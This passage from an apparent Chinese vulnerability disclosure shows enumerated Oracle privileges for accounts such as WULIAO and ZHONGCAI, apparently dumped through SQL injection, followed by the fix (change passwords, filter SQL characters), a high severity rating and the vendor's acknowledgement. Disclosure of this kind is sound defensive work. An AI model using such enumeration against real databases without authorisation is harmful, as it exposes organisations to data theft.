privilege: EXECUTE ANY TYPE privilege: INSERT ANY TABLE privilege: LOCK ANY TABLE privilege: SELECT ANY DICTIONARY privilege: SELECT ANY TABLE privilege: UNLIMITED TABLESPACE privilege: UPDATE ANY TABLE[*] WULIAO [14]: privilege: ADMINISTER DATABASE TRIGGER privilege: CREATE ANY JOB privilege: CREATE DATABASE LINK privilege: CREATE JOB privilege: CREATE PROCEDURE privilege: CREATE PUBLIC SYNONYM privilege: CREATE ROLE privilege: CREATE SEQUENCE privilege: CREATE SESSION privilege: CREATE TABLE privilege: CREATE TRIGGER privilege: CREATE VIEW privilege: EXECUTE ANY PROCEDURE privilege: UNLIMITED TABLESPACE[*] XDB [10]: privilege: ALTER SESSION privilege: CREATE INDEXTYPE privilege: CREATE LIBRARY privilege: CREATE OPERATOR privilege: CREATE PUBLIC SYNONYM privilege: CREATE SESSION privilege: CREATE VIEW privilege: DROP PUBLIC SYNONYM privilege: QUERY REWRITE privilege: UNLIMITED TABLESPACE[*] ZHONGCAI [14]: privilege: ADMINISTER DATABASE TRIGGER privilege: CREATE ANY JOB privilege: CREATE DATABASE LINK privilege: CREATE JOB privilege: CREATE PROCEDURE privilege: CREATE PUBLIC SYNONYM privilege: CREATE ROLE privilege: CREATE SEQUENCE privilege: CREATE SESSION privilege: CREATE TABLE privilege: CREATE TRIGGER privilege: CREATE VIEW privilege: EXECUTE ANY PROCEDURE privilege: UNLIMITED TABLESPACE[*] ZTOWEB [3]: privilege: ALTER ANY TABLE privilege: ALTER TABLESPACE privilege: UNLIMITED TABLESPACE
修改密码,过滤SQL特殊字符
危害等级:高
漏洞Rank:15
确认时间:2015-11-02 09:30
感谢白帽子的辛苦劳动,开发已经在开始修复。
暂无
